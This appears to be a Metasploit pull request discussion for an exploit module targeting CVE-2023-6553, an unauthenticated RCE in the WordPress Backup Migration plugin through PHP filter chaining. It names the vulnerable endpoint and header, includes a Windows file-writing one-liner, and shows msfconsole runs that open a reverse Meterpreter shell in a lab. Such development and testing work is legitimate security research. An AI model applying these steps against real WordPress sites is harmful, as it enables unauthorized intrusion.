WordPress Backup Migration Plugin PHP Filter Chain RCE (CVE-2023-6553)

[jheysel-r7]

This module exploits an unauth RCE in the WordPress plugin: Backup Migration (<= 1.3.7). The vulnerability is exploitable through the Content-Dir header which is sent to the /wp-content/plugins/backup-backup/includes/backup-heart.php endpoint.

The vuln makes use of a neat technique called PHP Filter Chaining which allows an attacker to prepend bytes to a string by continuously chaining character encoding conversion. This allows an attacker to prepend a PHP payload to a string which gets evaluated by a require statement, which results in command execution.

Verification

List the steps needed to make sure this thing works

• Follow the vulnerable target setup instructions outlined in the documentation file
• Start msfconsole
• Set the module options rhost, rport and lhost
• Run, get a meterpreter session running in the context of the user running WordPress and have a happy holiday season.

[Chocapikk]

Hi @jheysel-r7 , I forgot to specify but the payload will only work for Linux. I think this should work for Windows but I haven't tested it:

<nul set /p="C">>file.php

[jheysel-r7]

Hi @jheysel-r7 , I forgot to specify but the payload will only work for Linux. I think this should work for Windows but I haven't tested it:

<nul set /p="C">>file.php

Good catch @Chocapikk! I didn't realize that. Instead of implementing a separate Windows payload I went with a native PHP solution. The downside to this approach is that the payload is relatively much longer which means our temp payload filename has to be much shorter. I know we usually like our payloads to be around 8 random characters although in this scenario I don't think that's possible.

@cdelafuente-r7 let me know if you think it's reasonable to have a one character payload in this scenario.

[cdelafuente-r7]

Thanks @jheysel-r7 for this module and this cool technique! I just left a few minor comments. I tested using the docker installation you provided and it works great.

[cdelafuente-r7]

Thanks for updating this @jheysel-r7. It looks good to me now. However, I retested against the same Docker installation with the plugin backup-backup.1.3.7.zip installed and it doesn't work anymore. I checked the version before these changes (commit 6d8666e) and this one works fine. I'll send you the HTTP trace directly.

msf6 exploit(multi/http/wp_backup_migration_php_filter) > run verbose=true rhosts=127.0.0.1 rport=8000 lhost=192.168.144.1

[*] Started reverse TCP handler on 192.168.144.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.2
[*] Checking /wp-content/plugins/backup-backup/readme.txt
[*] Found version 1.3.7 in the plugin
[+] Detected Backup Migration Plugin version: 1.3.7
[+] The target appears to be vulnerable.
[*] Writing the payload to disk, character by character, please wait...
[!] The application responded to the request to trigger the payload, this is unexpected. Something may have gone wrong.
[!] This exploit may require manual cleanup of 'R' on the target
[!] This exploit may require manual cleanup of 'BqUT.php' on the target
[*] Exploit completed, but no session was created.

[cdelafuente-r7]

Thanks for updating this @jheysel-r7 ! Everything looks good to me now. I tested against a docker installation of Wordpress 6.4.2 with backup-backup plugin version 1.3.7 and verified I got a session. I'll go ahead and land it.

• Example output:

msf6 exploit(multi/http/wp_backup_migration_php_filter) > run verbose=true rhosts=127.0.0.1 rport=8000 lhost=192.168.100.101

[*] Started reverse TCP handler on 192.168.100.101:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.2
[*] Checking /wp-content/plugins/backup-backup/readme.txt
[*] Found version 1.3.7 in the plugin
[+] Detected Backup Migration Plugin version: 1.3.7
[+] The target appears to be vulnerable.
[*] Writing the payload to disk, character by character, please wait...
[*] Sending stage (39927 bytes) to 192.168.100.101
[+] Deleted z
[+] Deleted RjUF.php
[*] Meterpreter session 1 opened (192.168.100.101:4444 -> 192.168.100.101:62725) at 2024-01-17 18:25:14 +0100

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 27979d21cadf
OS          : Linux 27979d21cadf 6.5.11-linuxkit #1 SMP PREEMPT_DYNAMIC Wed Dec  6 17:14:50 UTC 2023 x86_64
Meterpreter : php/linux

[cdelafuente-r7]

Release Notes

This adds an exploit module that leverages an unauthenticated RCE in the WordPress plugin Backup Migration versions prior to 1.3.7. This vulnerability is identified as CVE-2023-6553. This also adds a library that implements a technique called PHP Filter Chaining which allows an attacker to prepend bytes to a string by continuously chaining character encoding conversion.